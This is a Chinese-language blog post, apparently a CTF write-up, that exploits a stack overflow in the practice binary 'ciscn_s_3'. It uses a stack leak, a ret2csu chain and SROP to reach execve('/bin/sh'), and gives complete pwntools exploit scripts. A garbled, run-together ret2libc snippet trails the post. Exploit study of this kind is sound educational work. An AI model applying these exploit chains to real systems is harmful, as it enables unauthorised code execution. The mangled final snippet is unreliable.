

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=dark>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="清风">
  <meta name="keywords" content="">
  
    <meta name="description" content="syscall与csu结合以及srop的简单使用基础检查  放入ida  存在栈溢出，并且buf只有0x10，而write有0x30,因此可以泄露栈上的内容  3B&#x3D;59是execv的调用号，这个指令可以调用内核execv 如果能够知道&#x2F;bin&#x2F;sh的地址，就可以获得shell 因为栈上没有&#x2F;bin&#x2F;sh,可以考虑read读入，结合前面有漏洞可以泄">
<meta property="og:type" content="article">
<meta property="og:title" content="syscall与csu结合以及srop的简单使用">
<meta property="og:url" content="http://example.com/2024/03/21/srop%E7%9A%84%E7%AE%80%E5%8D%95%E4%BD%BF%E7%94%A8/index.html">
<meta property="og:site_name" content="清风不识字">
<meta property="og:description" content="syscall与csu结合以及srop的简单使用基础检查  放入ida  存在栈溢出，并且buf只有0x10，而write有0x30,因此可以泄露栈上的内容  3B&#x3D;59是execv的调用号，这个指令可以调用内核execv 如果能够知道&#x2F;bin&#x2F;sh的地址，就可以获得shell 因为栈上没有&#x2F;bin&#x2F;sh,可以考虑read读入，结合前面有漏洞可以泄">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/img/125.jpg">
<meta property="article:published_time" content="2024-03-21T12:08:01.000Z">
<meta property="article:modified_time" content="2025-05-20T08:13:33.182Z">
<meta property="article:author" content="清风">
<meta property="article:tag" content="原创">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://example.com/img/125.jpg">
  
  
  
  <title>syscall与csu结合以及srop的简单使用 - 清风不识字</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  



  
<link rel="stylesheet" href="/css/scrollAnimation.css">
<link rel="stylesheet" href="https://cdn.bootcdn.net/ajax/libs/lxgw-wenkai-screen-webfont/1.7.0/style.min.css">
<link rel="stylesheet" href="/css/cloudedGlass.css">
<link rel="stylesheet" href="/css/selection.css">
<link rel="stylesheet" href="/css/macBorder.css">
<link rel="stylesheet" href="https://jsd.cdn.zzko.cn/gh/EmoryHuang/BlogBeautify@1.1/scroll.css">
<link rel="stylesheet" href="https://jsd.cdn.zzko.cn/gh/EmoryHuang/BlogBeautify@1.1/gradient.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":"0JWcKtnJwUWPWRrrdTax0lya-gzGzoHsz","app_key":"Q6KrvNK2N7nNsewpWYVdjHuI","server_url":"https://0jwcktnj.lc-cn-n1-shared.com","path":"window.location.pathname","ignore_local":true},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  

  

  

  
    
  



  
<meta name="generator" content="Hexo 7.3.0"><link rel="alternate" href="/atom.xml" title="清风不识字" type="application/atom+xml">
</head>


<body><!-- hexo injector body_begin start --><div id="web_bg"></div><!-- hexo injector body_begin end -->
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>清风不识字</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="syscall与csu结合以及srop的简单使用"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2024-03-21 20:08" pubdate>
          2024年3月21日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          1.4k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          12 分钟
        
      </span>
    

    
    
      
        <span id="leancloud-page-views-container" class="post-meta" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="leancloud-page-views"></span> 次
        </span>
        
      
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">syscall与csu结合以及srop的简单使用</h1>
            
              <p id="updated-time" class="note note-info" style="">
                
                  
                    本文最后更新于 2025年5月20日 下午
                  
                
              </p>
            
            
              <div class="markdown-body">
                
                <h1 id="syscall与csu结合以及srop的简单使用"><a href="#syscall与csu结合以及srop的简单使用" class="headerlink" title="syscall与csu结合以及srop的简单使用"></a>syscall与csu结合以及srop的简单使用</h1><p>基础检查</p>
<p><img src="/img/srop/a.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>放入ida</p>
<p><img src="/img/srop/b.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>存在栈溢出，并且buf只有0x10，而write有0x30,因此可以泄露栈上的内容</p>
<p><img src="/img/srop/c.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>3B&#x3D;59是execv的调用号，这个指令可以调用内核execv</p>
<p>如果能够知道&#x2F;bin&#x2F;sh的地址，就可以获得shell</p>
<p>因为栈上没有&#x2F;bin&#x2F;sh,可以考虑read读入，结合前面有漏洞可以泄露栈上的位置，</p>
<p>考虑用write泄露某一栈上地址，在计算此地址到输入点的偏移，</p>
<p>这样当我们输入&#x2F;bin&#x2F;sh时就可以得到这个地址</p>
<p><img src="/img/srop/d.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p><img src="/img/srop/e.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>这个地址存的是程序名</p>
<p><img src="/img/srop/f.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>如图也在泄露范围内</p>
<p>那么就可以泄露这个地址</p>
<p><img src="/img/srop/g.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>可以算出此地址到输入点的偏移为0x118</p>
<p>所以第一个payload的构造为</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs python">payload=<span class="hljs-string">b&#x27;/bin/sh\x00&#x27;</span>+<span class="hljs-string">b&#x27;a&#x27;</span>*<span class="hljs-number">8</span>+p64(vuln)<br>io.sendline(payload)<br>io.recv(<span class="hljs-number">0x20</span>)<br>binsh=u64(io.recv(<span class="hljs-number">8</span>))-<span class="hljs-number">0x118</span><br><span class="hljs-built_in">print</span>(<span class="hljs-built_in">hex</span>(binsh))<br></code></pre></td></tr></table></figure>

<p> payload2的构造</p>
<p>方法一</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs python">pay=<span class="hljs-string">b&#x27;/bin/sh\x00&#x27;</span>*<span class="hljs-number">2</span><br>pay+=p64(pop_csu)<br>pay+=p64(<span class="hljs-number">0</span>)*<span class="hljs-number">2</span><br>pay+=p64(binsh+<span class="hljs-number">0x50</span>)<br>pay+=p64(<span class="hljs-number">0</span>)*<span class="hljs-number">3</span><br>pay+=p64(mov_call)<br>pay+=p64(mov_rax)<br>pay+=p64(rdi)<br>pay+=p64(binsh)<br>pay+=p64(syscall)<br>io.sendline(pay)<br></code></pre></td></tr></table></figure>

<p>解释</p>
<p>在execve的系统调用中</p>
<p>参数布局为</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs python">rdi=/<span class="hljs-built_in">bin</span>/sh<br><br>rsi=<span class="hljs-number">0</span><br><br>rdx=<span class="hljs-number">0</span><br></code></pre></td></tr></table></figure>

<p><img src="/img/srop/h.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>因为找不到可用的rsi和rdx</p>
<p>我们考虑用csu间接将参数传给rsi 和rdx</p>
<p><img src="/img/srop/i.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>这个payload的构造非常巧妙 将rbx和rbp设为0，r12设为(binsh+0x50)都有特别用意</p>
<p>(1)根据我们前面payload的构造</p>
<p><img src="/img/srop/j.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>可以知道binsh+0x50就是将execve调用号放入rax的指令，方便进行syscall</p>
<p>(2)首先将rbx和rbp 设为0</p>
<p>使得通不过 cmp rbx,rbp</p>
<p>从而通过jnz指令跳回0x400580</p>
<p>这时候rbx已被加1，所以这次call的地址就变为(binsh+0x50+8)即pop_rdi的位置让我们能够继续控制程序</p>
<p>因为rsi 和rdx已经设置完了，那接下来只要将binsh传入rdi并执行syscall即可获得shell</p>
<p>最终exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><br>io=process(<span class="hljs-string">&#x27;./ciscn_s_3&#x27;</span>)<br>context.log_level=<span class="hljs-string">&#x27;debug&#x27;</span><br>context(arch=<span class="hljs-string">&#x27;amd64&#x27;</span>, os=<span class="hljs-string">&#x27;linux&#x27;</span>)<br>elf=ELF(<span class="hljs-string">&#x27;./ciscn_s_3&#x27;</span>)<br><br>pop_csu=<span class="hljs-number">0x40059A</span><br>mov_call=<span class="hljs-number">0x400580</span><br>rdi=<span class="hljs-number">0x4005A3</span><br>vuln=<span class="hljs-number">0x4004ED</span><br>mov_rax=<span class="hljs-number">0x4004E2</span><br>syscall=<span class="hljs-number">0x400501</span><br>payload=<span class="hljs-string">b&#x27;/bin/sh\x00&#x27;</span>+<span class="hljs-string">b&#x27;a&#x27;</span>*<span class="hljs-number">8</span>+p64(vuln)<br>io.sendline(payload)<br>io.recv(<span class="hljs-number">0x20</span>)<br>binsh=u64(io.recv(<span class="hljs-number">8</span>))-<span class="hljs-number">0x118</span><br><span class="hljs-built_in">print</span>(<span class="hljs-built_in">hex</span>(binsh))<br>pay=<span class="hljs-string">b&#x27;/bin/sh\x00&#x27;</span>*<span class="hljs-number">2</span>+p64(pop_csu)+p64(<span class="hljs-number">0</span>)*<span class="hljs-number">2</span>+p64(binsh+<span class="hljs-number">0x50</span>)+p64(<span class="hljs-number">0</span>)*<span class="hljs-number">3</span>+p64(mov_call)+p64(mov_rax)+p64(rdi)+p64(binsh)+p64(syscall)<br>io.sendline(pay)<br><span class="hljs-string">&quot;&quot;&quot;frame=SigreturnFrame()</span><br><span class="hljs-string">frame.rax=constants.SYS_execve</span><br><span class="hljs-string">frame.rdi=binsh</span><br><span class="hljs-string">frame.rsi=0x0</span><br><span class="hljs-string">frame.rdx=0x0</span><br><span class="hljs-string">frame.rip=syscall</span><br><span class="hljs-string">payload=b&#x27;/bin/sh\x00&#x27;.ljust(0x10,b&#x27;a&#x27;)+p64(0x4004da)+p64(syscall)+bytes(frame)&quot;&quot;&quot;</span><br><br>io.interactive()<br></code></pre></td></tr></table></figure>

<p><strong>方法二 srop利用</strong></p>
<p>原理:</p>
<p>这里基础知识就搬运ctfwiki上的了，讲解的我觉得很全面了，我也会进行添加补充讲解，便于理解。</p>
<p>signal 机制是类 unix 系统中进程之间相互传递信息的一种方法。一般，我们也称其为软中断信号，或者软中断。比如说，进程之间可以通过系统调用 kill 来发送软中断信号。一般来说，信号机制常见的步骤如下图所示：</p>
<p><img src="/img/srop/k.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<ol>
<li>内核向某个进程发送 signal 机制，该进程会被暂时挂起，进入内核态。</li>
<li>内核会为该进程保存相应的上下文，<strong>主要是将所有寄存器压入栈中，以及压入 signal 信息，以及指向 sigreturn 的系统调用地址</strong>。此时栈的结构如下图所示，我们称 ucontext 以及 siginfo 这一段为 Signal Frame。<strong>需要注意的是，这一部分是在用户进程的地址空间的。</strong>之后会跳转到注册过的 signal handler 中处理相应的 signal。因此，当 signal handler 执行完之后，就会执行 sigreturn 代码。</li>
</ol>
<p><img src="/img/srop/l.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs">①保存上下文环境（即各种寄存器），接下来走到②执行信号处理函数，处理完后③恢复相关栈环境，④继续执行用户程序。而在恢复寄存器环境时没有去校验这个栈是不是合法的，如果我们能够控制栈，就能在恢复上下文环境这个环节直接设定相关寄存器的值。<br></code></pre></td></tr></table></figure>

<p>在执行sigreturn 之后的restore context阶段，整个frame是在用户态，同时会执行大量的pop指令，这时我们就可以直接设定寄存器的值来伪造一个虚假的frame从而getshell</p>
<p>使用SROP的<strong>前提</strong></p>
<ul>
<li><p>首先程序必须存在溢出，能够控制返回地址。</p>
</li>
<li><p>可以去系统调用sigreturn（如果找不到合适的系统调用号，可以看看能不能利用read函数来控制RAX的值）</p>
</li>
<li><p>必须能够知道&#x2F;bin&#x2F;sh的地址，如果写的bss段，直接写地址就行，如果写到栈里，还需要想办法去泄露栈地址。</p>
</li>
<li><p>允许溢出的长度足够长，这样可以去布局我们想要的寄存器的值</p>
</li>
<li><p>需要知道syscall指令的地址</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs python">frame=SigreturnFrame()<br>frame.rax=constants.SYS_execve<br>frame.rdi=binsh<br>frame.rsi=<span class="hljs-number">0x0</span><br>frame.rdx=<span class="hljs-number">0x0</span><br>frame.rip=syscall<br>payload=<span class="hljs-string">b&#x27;/bin/sh\x00&#x27;</span>.ljust(<span class="hljs-number">0x10</span>,<span class="hljs-string">b&#x27;a&#x27;</span>)+p64(<span class="hljs-number">0x4004da</span>)+p64(syscall)+<span class="hljs-built_in">bytes</span>(frame)<br></code></pre></td></tr></table></figure>

<p>注意这里的syscall必须是syscall_ret,来控制程序</p>
</li>
</ul>
<p>最终exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><br>io=process(<span class="hljs-string">&#x27;./ciscn_s_3&#x27;</span>)<br>context.log_level=<span class="hljs-string">&#x27;debug&#x27;</span><br>context(arch=<span class="hljs-string">&#x27;amd64&#x27;</span>, os=<span class="hljs-string">&#x27;linux&#x27;</span>)<br>elf=ELF(<span class="hljs-string">&#x27;./ciscn_s_3&#x27;</span>)<br><br>pop_csu=<span class="hljs-number">0x40059A</span><br>mov_call=<span class="hljs-number">0x400580</span><br>rdi=<span class="hljs-number">0x4005A3</span><br>vuln=<span class="hljs-number">0x4004ED</span><br>mov_rax=<span class="hljs-number">0x4004E2</span><br>syscall=<span class="hljs-number">0x400517</span><br>payload=<span class="hljs-string">b&#x27;/bin/sh\x00&#x27;</span>+<span class="hljs-string">b&#x27;a&#x27;</span>*<span class="hljs-number">8</span>+p64(vuln)<br>io.sendline(payload)<br>io.recv(<span class="hljs-number">0x20</span>)<br>binsh=u64(io.recv(<span class="hljs-number">8</span>))-<span class="hljs-number">0x118</span><br><span class="hljs-built_in">print</span>(<span class="hljs-built_in">hex</span>(binsh))<br><span class="hljs-string">&#x27;&#x27;&#x27;pay=b&#x27;/bin/sh\x00&#x27;*2+p64(pop_csu)+p64(0)*2+p64(binsh+0x50)+p64(0)*3+p64(mov_call)+p64(mov_rax)+p64(rdi)+p64(binsh)+p64(syscall)&#x27;&#x27;&#x27;</span><br>io.sendline(pay)<br>frame=SigreturnFrame()<br>frame.rax=constants.SYS_execve<br>frame.rdi=binsh<br>frame.rsi=<span class="hljs-number">0x0</span><br>frame.rdx=<span class="hljs-number">0x0</span><br>frame.rip=syscall<br>payload=<span class="hljs-string">b&#x27;/bin/sh\x00&#x27;</span>.ljust(<span class="hljs-number">0x10</span>,<span class="hljs-string">b&#x27;a&#x27;</span>)+p64(<span class="hljs-number">0x4004da</span>)+p64(syscall)+<span class="hljs-built_in">bytes</span>(frame)<br>io.sendline(payload)<br><br>io.interactive()<br></code></pre></td></tr></table></figure>

<p> 拿到shell</p>
<p>x from pwn import *from LibcSearcher import LibcSearchersh&#x3D;process(‘.&#x2F;123’)elf&#x3D;ELF(‘.&#x2F;123’)read&#x3D;elf.got[‘read’]write&#x3D;elf.plt[‘write’]​payload &#x3D;b’a’*140+p32(write)+p32(0x80483f4)+p32(1)+p32(read)+p32(4)sh.send(payload)read_got&#x3D;u32(sh.recv())print(“the read of address :”,hex(read_got))​base&#x3D;read_got-0x10a840system&#x3D;base+0x04c880binsh&#x3D;base+0x1b5fc8payload&#x3D;b’a’*140+p32(system)+p32(0)+p32(binsh)sh.send(payload)sh.interactive()python</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E6%A0%88%E5%88%A9%E7%94%A8/" class="category-chain-item">栈利用</a>
  
  
    <span>></span>
    
  <a href="/categories/%E6%A0%88%E5%88%A9%E7%94%A8/python/" class="category-chain-item">python</a>
  
  

  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/%E5%8E%9F%E5%88%9B/" class="print-no-link">#原创</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>syscall与csu结合以及srop的简单使用</div>
      <div>http://example.com/2024/03/21/srop的简单使用/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>清风</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2024年3月21日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2024/04/23/ROP%E4%B9%8Bret2alsolve/" title="ROP之ret2alsolve">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">ROP之ret2alsolve</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2024/03/13/libc%E6%B3%84%E9%9C%B2/" title="关于ret2libc的泄露">
                        <span class="hidden-mobile">关于ret2libc的泄露</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#valine', function() {
      Fluid.utils.createScript('https://lib.baomitu.com/valine/1.5.1/Valine.min.js', function() {
        var options = Object.assign(
          {"appId":"0JWcKtnJwUWPWRrrdTax0lya-gzGzoHsz","appKey":"Q6KrvNK2N7nNsewpWYVdjHuI","path":"window.location.pathname","placeholder":"说点什么","avatar":"retro","meta":["nick","mail","link"],"requiredFields":[],"pageSize":10,"lang":"zh-CN","highlight":false,"recordIP":false,"serverURLs":"","emojiCDN":null,"emojiMaps":null,"enableQQ":false},
          {
            el: "#valine",
            path: window.location.pathname
          }
        )
        new Valine(options);
        Fluid.utils.waitElementVisible('#valine .vcontent', () => {
          var imgSelector = '#valine .vcontent img:not(.vemoji)';
          Fluid.plugins.imageCaption(imgSelector);
          Fluid.plugins.fancyBox(imgSelector);
        })
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="leancloud-site-pv-container" style="display: none">
        总访问量 
        <span id="leancloud-site-pv"></span>
         次
      </span>
    
    
      <span id="leancloud-site-uv-container" style="display: none">
        总访客数 
        <span id="leancloud-site-uv"></span>
         人
      </span>
    
    

  

</div>

  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


